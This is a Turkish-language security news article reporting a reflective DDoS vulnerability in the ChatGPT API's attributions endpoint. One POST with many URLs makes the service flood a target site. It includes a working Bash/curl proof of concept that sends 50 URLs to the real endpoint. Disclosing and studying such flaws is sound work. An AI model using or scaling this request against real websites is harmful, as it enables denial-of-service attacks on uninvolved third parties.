Güvenlik araştırmacıları, OpenAI’nin ChatGPT API’sinde, saldırganların Yansıtıcı Dağıtılmış Hizmet Reddi (DDoS) saldırıları başlatmak için mimarisinden yararlanmasına olanak tanıyan ciddi bir güvenlik açığını ortaya çıkardı.
8,6’lık yüksek önem derecesine sahip CVSS puanıyla karakterize edilen bu boşluk, bulut platformlarında, özellikle de Microsoft’un Azure’unda dağıtılan yapay zeka hizmetlerinin ölçeklenebilirliği ve güvenliğiyle ilgili önemli endişeleri artırıyor.
Güvenlik Açığına Genel Bakış
Güvenlik açığı, ChatGPT API’nin https://chatgpt.com/backend-api/attributions adresine gönderilen HTTP POST isteklerini işlemedeki yetersizliklerinden kaynaklanıyor.
Saldırganlar, sistem giriş doğrulama konusunda herhangi bir sınırlama uygulamadan çok sayıda (potansiyel olarak binlerce) URL içeren tek bir istek oluşturabilir.
Sonuç olarak API, farkında olmadan hedeflenen bir web sitesine Microsoft Azure ile ilişkili birden fazla IP adresinden eş zamanlı istekler göndererek kurbanın sunucusunu bunaltıyor.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
İyi biçimlendirilmiş bir HTTP POST isteği ChatGPT sunucusuna ulaştığında, yükte sağlanan her URL için ayrı giden istekleri tetikler.
OpenAI’nin API’si yinelenen URL’leri kontrol edemediğinden veya bağlantı sayısını kısıtlamadığından, hazırlanmış bir saldırı, hedef web sunucusuna büyük miktarda istek akınına neden olabilir.
Bu davranış, OpenAI’nin kalite kontrol ve yazılım mühendisliği süreçlerindeki önemli eksiklikleri vurgulayarak olası kötüye kullanımı önlemek için acil düzeltici eylem yapılmasını gerektirir.
Bu kusur, hedeflenen web siteleri için ciddi bir tehdit oluşturuyor; çünkü bu siteler, HTTP isteklerinin yağmuru altında kolaylıkla bunalıma girebiliyor.
Kullanılabilirlik açısından ciddi sonuçlar doğurabilir ve potansiyel olarak uzun süreli hizmet kesintilerine yol açabilir.
Ayrıca, güvenlik açığı veri gizliliğini veya bütünlüğünü tehlikeye atmasa da, trafiğin büyük hacmi normal operasyonları ciddi şekilde bozabilir ve etkilenen kuruluşların mali ve itibar kaybına yol açabilir.
Kavram Kanıtı
Güvenlik uzmanları, basit bir kavram kanıtıyla bu istismarın uygulanabilirliğini gösterdi. Aşağıdaki Bash betiği, bir saldırganın şüphelenmeyen bir hedefe yönelik 50 HTTP isteğini nasıl başlatabileceğini göstermektedir:
#!/bin/bash
echo {1..50} | tr ' ' '\n' | (
while read -r i;
do echo "https://my-website.localhost:$RANDOM/$i-$RANDOM.txt";
done
) | jq -R -s -j -c '{ "urls": split("\n")[:-1] }' \
| curl -v --http1.1 \
-H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.32 (KHTML, like Gecko) Chrome/133.0.0.1 Safari/535.32' \
-H "content-type: application/json" \
-H 'origin: https://www.chatgpt.com' \
--data-binary @- -X POST 'https://chatgpt.com/backend-api/attributions'
Hedeflenen web sitesindeki günlük dosyaları, saniyeler içinde birden fazla bağlantı girişiminin gerçekleştiği endişe verici modelleri ortaya çıkarıyor. Bu, başarılı bir saldırının hizmette önemli bir bozulmaya yol açabileceğini gösterir.
GitHub raporuna göre, ChatGPT tarayıcısı güvenlik açığının keşfi, yapay zeka sistemlerinin geliştirilmesinde gelişmiş kalite kontrol önlemlerine ve sıkı güvenlik protokollerine olan acil ihtiyacın altını çiziyor.
OpenAI’nin derhal düzeltmesi yapılmazsa, bu güvenlik açığından yararlanılabilir ve bu da dünya çapındaki web hizmetleri için potansiyel olarak yıkıcı sonuçlara yol açabilir.
Teknoloji topluluğundaki paydaşların, dijital altyapılarının bütünlüğünü korumak için bu tür yüksek önemdeki güvenlik açıklarını ele alma konusunda dikkatli ve proaktif olmaları gerekiyor.
Jenkins & Jira’yı Kullanarak Uygulama Güvenliğini CI/CD İş Akışlarınıza Entegre Etme -> Ücretsiz Web Semineri